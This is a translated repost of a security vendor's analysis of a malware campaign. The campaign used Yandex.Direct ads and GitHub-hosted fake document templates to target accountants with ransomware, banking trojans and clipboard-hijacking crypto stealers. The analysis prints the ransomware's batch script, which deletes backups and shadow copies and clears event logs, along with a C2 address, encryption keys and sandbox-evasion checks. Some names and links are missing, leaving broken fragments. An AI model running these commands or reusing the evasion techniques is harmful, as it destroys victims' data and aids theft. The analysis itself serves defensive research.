Da biste ciljali računovođe u cyber napadu, možete koristiti radne dokumente koje traže na mreži. To je otprilike ono što je sajber grupa radila u posljednjih nekoliko mjeseci, distribuirajući poznate backdoor. и , kao i enkriptori i softver za krađu kriptovaluta. Većina ciljeva nalazi se u Rusiji. Napad je izveden postavljanjem zlonamjernog oglašavanja na Yandex.Direct. Potencijalne žrtve su upućene na web stranicu gdje je od njih zatraženo da preuzmu zlonamjerni fajl prerušen kao predložak dokumenta. Yandex je uklonio zlonamjerno oglašavanje nakon našeg upozorenja.
Buhtrapov izvorni kod je procurio na internet u prošlosti tako da ga svako može koristiti. Nemamo informacija o dostupnosti RTM koda.
U ovom postu ćemo vam reći kako su napadači distribuirali zlonamjerni softver koristeći Yandex.Direct i hostirali ga na GitHub-u. Objava će se završiti tehničkom analizom zlonamjernog softvera.
Buhtrap i RTM su ponovo u poslu
Mehanizam širenja i žrtve
Različiti tereti koji se isporučuju žrtvama dijele zajednički mehanizam širenja. Sve zlonamjerne datoteke koje su kreirali napadači smještene su u dva različita GitHub spremišta.
Tipično, spremište je sadržavalo jednu zlonamjernu datoteku za preuzimanje, koja se često mijenjala. Pošto vam GitHub omogućava da vidite istoriju promena u spremištu, možemo videti koji je zlonamerni softver distribuiran tokom određenog perioda. Da bi se žrtva uvjerila da preuzme zlonamjerni fajl, korištena je web stranica blanki-shabloni24[.]ru, prikazana na gornjoj slici.
Dizajn sajta i svi nazivi zlonamernih fajlova prate jedinstven koncept – obrasci, šabloni, ugovori, uzorci itd. S obzirom da su Buhtrap i RTM softver već korišćeni u napadima na računovođe u prošlosti, pretpostavili smo da strategija u novoj kampanji je ista. Pitanje je samo kako je žrtva došla do mjesta napadača.
Infection
Najmanje nekoliko potencijalnih žrtava koje su završile na ovoj stranici privuklo je zlonamjerno oglašavanje. Ispod je primjer URL-a:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Kao što možete vidjeti iz linka, baner je postavljen na legitimnom računovodstvenom forumu bb.f2[.]kz. Važno je napomenuti da su se baneri pojavili na različitim stranicama, svi su imali isti ID kampanje (blanki_rsya), a većina se odnosila na računovodstvene ili pravne usluge. URL pokazuje da je potencijalna žrtva koristila zahtjev „preuzmi obrazac za fakturu“, koji podržava našu hipotezu o ciljanim napadima. Ispod su stranice na kojima su se pojavili baneri i odgovarajući upiti za pretraživanje.
- preuzmi obrazac računa – bb.f2[.]kz
- uzorak ugovora - Ipopen[.]ru
- uzorak žalbe na prijavu - 77metrov[.]ru
- obrazac ugovora - blank-dogovor-kupli-prodazhi[.]ru
- uzorak sudske tužbe - zen.yandex[.]ru
- uzorak žalbe - yurday[.]ru
- uzorci obrazaca ugovora – Regforum[.]ru
- obrazac ugovora – assistentus[.]ru
- uzorak ugovora o stanu – napravah[.]com
- uzorci pravnih ugovora - avito[.]ru
Stranica blanki-shabloni24[.]ru je možda konfigurisana da prođe jednostavnu vizuelnu procenu. Tipično, oglas koji upućuje na stranicu profesionalnog izgleda s vezom na GitHub ne izgleda kao nešto očigledno loše. Osim toga, napadači su otpremali zlonamjerne datoteke u spremište samo u ograničenom periodu, vjerovatno tokom kampanje. Većinu vremena GitHub spremište je sadržavalo praznu zip arhivu ili praznu EXE datoteku. Tako su napadači mogli distribuirati oglašavanje putem Yandex.Directa na web-lokacijama koje su najvjerovatnije posjećivali računovođe koji su dolazili kao odgovor na određene upite za pretraživanje.
Zatim, pogledajmo različite korisne terete distribuirane na ovaj način.
Analiza korisnog opterećenja
Hronologija distribucije
Zlonamjerna kampanja započela je krajem oktobra 2018. godine i aktivna je u vrijeme pisanja ovog teksta. Pošto je čitavo spremište bilo javno dostupno na GitHubu, sastavili smo tačnu vremensku liniju distribucije šest različitih porodica zlonamjernog softvera (pogledajte sliku ispod). Dodali smo liniju koja pokazuje kada je baner link otkriven, mjereno ESET telemetrijom, radi poređenja s git historijom. Kao što vidite, ovo dobro korelira sa dostupnošću korisnog opterećenja na GitHubu. Neslaganje krajem februara može se objasniti činjenicom da nismo imali dio historije promjena jer je spremište uklonjeno sa GitHub-a prije nego što smo ga mogli dobiti u cijelosti.
Slika 1. Hronologija distribucije zlonamjernog softvera.
Certifikati za potpisivanje koda
Kampanja je koristila više certifikata. Neke je potpisalo više od jedne porodice malvera, što dalje ukazuje da različiti uzorci pripadaju istoj kampanji. Uprkos dostupnosti privatnog ključa, operateri nisu sistematski potpisivali binarne datoteke i nisu koristili ključ za sve uzorke. Krajem februara 2019. napadači su počeli kreirati nevažeće potpise koristeći Googleov certifikat za koji nisu imali privatni ključ.
Svi certifikati uključeni u kampanju i porodice zlonamjernog softvera koje potpisuju navedeni su u tabeli ispod.
Također smo koristili ove certifikate za potpisivanje koda za uspostavljanje veza sa drugim porodicama zlonamjernog softvera. Za većinu sertifikata nismo pronašli uzorke koji nisu distribuirani preko GitHub repozitorija. Međutim, certifikat TOV “MARIYA” korišten je za potpisivanje zlonamjernog softvera koji pripada botnetu , adware i rudari. Malo je vjerovatno da je ovaj zlonamjerni softver povezan s ovom kampanjom. Najvjerovatnije je certifikat kupljen na darknetu.
Win32/Filecoder.Buhtrap
Prva komponenta koja nam je privukla pažnju je novootkriveni Win32/Filecoder.Buhtrap. Ovo je Delphi binarni fajl koji se ponekad pakira. Uglavnom je distribuiran u periodu od februara do marta 2019. Ponaša se kako i priliči ransomware programu - pretražuje lokalne diskove i mrežne mape i šifrira datoteke koje pronađe. Ne treba mu internetska veza da bude ugrožena jer ne kontaktira server da pošalje ključeve za šifriranje. Umjesto toga, dodaje "token" na kraj poruke o otkupnini i predlaže korištenje e-pošte ili Bitmessage-a za kontaktiranje operatera.
Da bi šifrirao što je moguće više osjetljivih resursa, Filecoder.Buhtrap pokreće nit dizajniranu za gašenje ključnog softvera koji može imati otvorene rukovaoce datotekama koji sadrže vrijedne informacije koje bi mogle ometati šifriranje. Ciljni procesi su uglavnom sistemi za upravljanje bazama podataka (DBMS). Osim toga, Filecoder.Buhtrap briše datoteke dnevnika i sigurnosne kopije kako bi otežao oporavak podataka. Da biste to učinili, pokrenite batch skriptu ispod.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap koristi legitimnu internetsku uslugu IP Logger dizajniranu za prikupljanje informacija o posjetiteljima web stranice. Ovo je namijenjeno praćenju žrtava ransomwarea, što je odgovornost komandne linije:
mshta.exe "javascript:document.write('');"
Datoteke za šifriranje se biraju ako se ne podudaraju s tri liste isključenja. Prvo, datoteke sa sljedećim ekstenzijama nisu šifrirane: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys i .bat. Drugo, isključene su sve datoteke za koje puna putanja sadrži nizove direktorija sa donje liste.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Treće, određeni nazivi datoteka su također isključeni iz šifriranja, među njima i naziv datoteke poruke o otkupnini. Lista je predstavljena u nastavku. Očigledno je da su svi ovi izuzeci namijenjeni održavanju rada mašine, ali uz minimalnu ispravnost.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Šema šifriranja datoteka
Kada se izvrši, zlonamjerni softver generiše 512-bitni RSA par ključeva. Privatni eksponent (d) i modul (n) se zatim šifriraju tvrdo kodiranim 2048-bitnim javnim ključem (javni eksponent i modul), zlib-pakiranim i base64 kodiranim. Kod odgovoran za to je prikazan na slici 2.
Slika 2. Rezultat Hex-Rays dekompilacije procesa generisanja 512-bitnog RSA para ključeva.
Ispod je primjer običnog teksta s generiranim privatnim ključem, koji je token priložen poruci o otkupnini.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Javni ključ napadača je dat u nastavku.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Datoteke su šifrirane pomoću AES-128-CBC sa 256-bitnim ključem. Za svaku šifrovanu datoteku generišu se novi ključ i novi vektor inicijalizacije. Ključne informacije se dodaju na kraj šifrovane datoteke. Razmotrimo format šifrirane datoteke.
Šifrirani fajlovi imaju sljedeće zaglavlje:
Podaci izvorne datoteke sa dodatkom VEGA magične vrijednosti su šifrirani na prvih 0x5000 bajtova. Sve informacije o dešifriranju su priložene datoteci sa sljedećom strukturom:
- Oznaka veličine datoteke sadrži oznaku koja pokazuje da li je datoteka veća od 0x5000 bajtova
— AES ključ blob = ZlibCompress(RSAEncrypt(AES ključ + IV, javni ključ generiranog para ključeva RSA))
- RSA ključ blob = ZlibCompress(RSAEncrypt(generirani RSA privatni ključ, tvrdo kodirani RSA javni ključ))
Win32/ClipBanker
Win32/ClipBanker je komponenta koja se distribuirala s prekidima od kraja oktobra do početka decembra 2018. Njegova uloga je da prati sadržaj međuspremnika, traži adrese novčanika za kriptovalute. Nakon što je odredio ciljnu adresu novčanika, ClipBanker je zamjenjuje adresom za koju se vjeruje da pripada operaterima. Uzorci koje smo pregledali nisu bili ni upakovani ni zamagljeni. Jedini mehanizam koji se koristi za maskiranje ponašanja je string enkripcija. Adrese novčanika operatera su šifrirane pomoću RC4. Ciljane kriptovalute su Bitcoin, Bitcoin cash, Dogecoin, Ethereum i Ripple.
Tokom perioda koji se malver širio na Bitcoin novčanike napadača, mala količina poslata je VTS-u, što dovodi u sumnju uspjeh kampanje. Osim toga, nema dokaza koji bi ukazivali na to da su ove transakcije uopće bile povezane s ClipBankerom.
Win32/RTM
Win32/RTM komponenta je distribuirana nekoliko dana početkom marta 2019. RTM je trojanski bankar napisan u Delphiju, namijenjen daljinskim bankarskim sistemima. Istraživači ESET-a objavili su 2017 ovog programa, opis je i dalje relevantan. U januaru 2019, Palo Alto Networks je također objavio .
Buhtrap Loader
Neko vrijeme je na GitHubu bio dostupan program za preuzimanje koji nije bio sličan prethodnim Buhtrap alatima. On se okreće https://94.100.18[.]67/RSS.php?<some_id> da dobije sljedeću fazu i učita je direktno u memoriju. Možemo razlikovati dva ponašanja koda druge faze. U prvom URL-u, RSS.php je direktno proslijedio Buhtrap backdoor - ovaj backdoor je vrlo sličan onom dostupnom nakon što je izvorni kod procurio.
Zanimljivo je da vidimo nekoliko kampanja sa Buhtrap backdoor-om, a navodno ih vode različiti operateri. U ovom slučaju, glavna razlika je u tome što se backdoor učitava direktno u memoriju i ne koristi uobičajenu shemu s procesom implementacije DLL-a o kojem smo pričali . Osim toga, operateri su promijenili ključ RC4 koji se koristi za šifriranje mrežnog prometa do C&C servera. U većini kampanja koje smo vidjeli, operateri se nisu trudili mijenjati ovaj ključ.
Drugo, složenije ponašanje bilo je da je RSS.php URL proslijeđen drugom učitavaču. Implementirao je neku obfusaciju, kao što je ponovna izgradnja tabele dinamičkog uvoza. Svrha pokretača je da kontaktira C&C server [.]com/api/F27F84EDA4D13B15/2, pošaljite evidenciju i sačekajte odgovor. Obrađuje odgovor kao blob, učitava ga u memoriju i izvršava. Korisni teret koji smo vidjeli prilikom izvršavanja ovog učitavača bio je isti Buhtrap backdoor, ali možda postoje i druge komponente.
Android/Spy.Banker
Zanimljivo je da je komponenta za Android takođe pronađena u GitHub repozitorijumu. U matičnoj filijali bio je samo jedan dan - 1. Osim što je objavljen na GitHub-u, ESET telemetrija ne nalazi dokaze o distribuciji ovog zlonamjernog softvera.
Komponenta je bila hostirana kao Android aplikacijski paket (APK). Jako je zamućena. Zlonamjerno ponašanje je skriveno u šifriranom JAR-u koji se nalazi u APK-u. Šifriran je RC4 pomoću ovog ključa:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Isti ključ i algoritam se koriste za šifriranje nizova. JAR se nalazi u APK_ROOT + image/files. Prva 4 bajta datoteke sadrže dužinu šifrovanog JAR-a, koja počinje odmah nakon polja za dužinu.
Nakon dešifriranja fajla, otkrili smo da je to bio Anubis - ranije bankar za Android. Zlonamjerni softver ima sljedeće karakteristike:
- snimanje mikrofonom
- pravljenje snimaka ekrana
- dobijanje GPS koordinata
- keylogger
- šifriranje podataka uređaja i zahtjev za otkupninom
- slanje neželjene pošte
Zanimljivo je da je bankar koristio Twitter kao rezervni komunikacioni kanal da bi dobio još jedan C&C server. Uzorak koji smo analizirali koristio je račun @JonesTrader, ali je u vrijeme analize već bio blokiran.
Bankar sadrži listu ciljnih aplikacija na Android uređaju. Duža je od liste dobijene u studiji Sophos. Lista uključuje mnoge bankarske aplikacije, programe za online kupovinu kao što su Amazon i eBay, te usluge kriptovaluta.
MSIL/ClipBanker.IH
Posljednja komponenta distribuirana u sklopu ove kampanje bila je .NET Windows izvršna datoteka, koja se pojavila u martu 2019. godine. Većina proučenih verzija bila je pakirana sa ConfuserEx v1.0.0. Kao i ClipBanker, ova komponenta koristi međuspremnik. Njegov cilj je širok spektar kriptovaluta, kao i ponuda na Steamu. Osim toga, koristi uslugu IP Logger da ukrade Bitcoin privatni WIF ključ.
Mehanizmi zaštite
Pored prednosti koje ConfuserEx pruža u sprečavanju otklanjanja grešaka, izbacivanja i neovlašćenog pristupa, komponenta uključuje mogućnost otkrivanja antivirusnih proizvoda i virtuelnih mašina.
Da bi potvrdio da radi na virtuelnoj mašini, zlonamerni softver koristi ugrađenu Windows WMI komandnu liniju (WMIC) da zahteva informacije o BIOS-u, naime:
wmic bios
Zatim program analizira izlaz komande i traži ključne riječi: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Da bi otkrio antivirusne proizvode, zlonamjerni softver šalje zahtjev Windows Management Instrumentation (WMI) Windows Security Center koristeći ManagementObjectSearcher API kao što je prikazano ispod. Nakon dekodiranja sa base64 poziv izgleda ovako:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Slika 3. Proces za identifikaciju antivirusnih proizvoda.
Osim toga, zlonamjerni softver provjerava da li , alat za zaštitu od napada međumemorije i, ako je pokrenut, suspenduje sve niti u tom procesu, čime se onemogućava zaštita.
Upornost
Verzija zlonamjernog softvera koju smo proučavali sama se kopira %APPDATA%googleupdater.exe i postavlja atribut “hidden” za google direktorij. Zatim mijenja vrijednost SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell u Windows registru i dodaje putanju updater.exe. Na ovaj način, zlonamjerni softver će se izvršavati svaki put kada se korisnik prijavi.
Zlonamjerno ponašanje
Kao i ClipBanker, zlonamjerni softver prati sadržaj međuspremnika i traži adrese novčanika za kriptovalute, a kada ga pronađe, zamjenjuje ga jednom od adresa operatera. Ispod je lista ciljnih adresa na osnovu onoga što se nalazi u kodu.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Za svaki tip adrese postoji odgovarajući regularni izraz. Vrijednost STEAM_URL se koristi za napad na Steam sistem, kao što se može vidjeti iz regularnog izraza koji se koristi za definiranje u baferu:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Kanal za eksfiltraciju
Osim zamjene adresa u baferu, zlonamjerni softver cilja na privatne WIF ključeve Bitcoin, Bitcoin Core i Electrum Bitcoin novčanike. Program koristi plogger.org kao kanal za eksfiltraciju da dobije WIF privatni ključ. Da bi to učinili, operateri dodaju podatke privatnog ključa u HTTP zaglavlje User-Agenta, kao što je prikazano ispod.
Slika 4. IP Logger konzola sa izlaznim podacima.
Operateri nisu koristili iplogger.org za eksfiltriranje novčanika. Vjerovatno su pribjegli drugoj metodi zbog ograničenja od 255 znakova u polju User-Agentprikazano u web interfejsu IP Loggera. U uzorcima koje smo proučavali, drugi izlazni server je pohranjen u varijablu okruženja DiscordWebHook. Iznenađujuće, ova varijabla okruženja nije dodijeljena nigdje u kodu. Ovo sugerira da je zlonamjerni softver još uvijek u razvoju i da je varijabla dodijeljena testnoj mašini operatera.
Postoji još jedan znak da je program u razvoju. Binarna datoteka uključuje dva iplogger.org URL-a, i oba se pitaju kada se podaci eksfiltriraju. U zahtjevu za jedan od ovih URL-ova, vrijednosti u polju Referer prethodi “DEV /”. Pronašli smo i verziju koja nije bila upakovana pomoću ConfuserExa, primalac za ovaj URL se zove DevFeedbackUrl. Na osnovu naziva varijable okruženja, vjerujemo da operateri planiraju koristiti legitimnu uslugu Discord i njen sistem za presretanje weba za krađu novčanika kriptovaluta.
zaključak
Ova kampanja je primjer korištenja legitimnih reklamnih usluga u sajber napadima. Šema je usmjerena na ruske organizacije, ali ne bismo bili iznenađeni kada bismo vidjeli takav napad koristeći neruske usluge. Kako bi izbjegli kompromis, korisnici moraju biti sigurni u reputaciju izvora softvera koji preuzimaju.
Kompletna lista indikatora kompromisa i atributa MITER ATT&CK dostupna je na adresi .
izvor: www.habr.com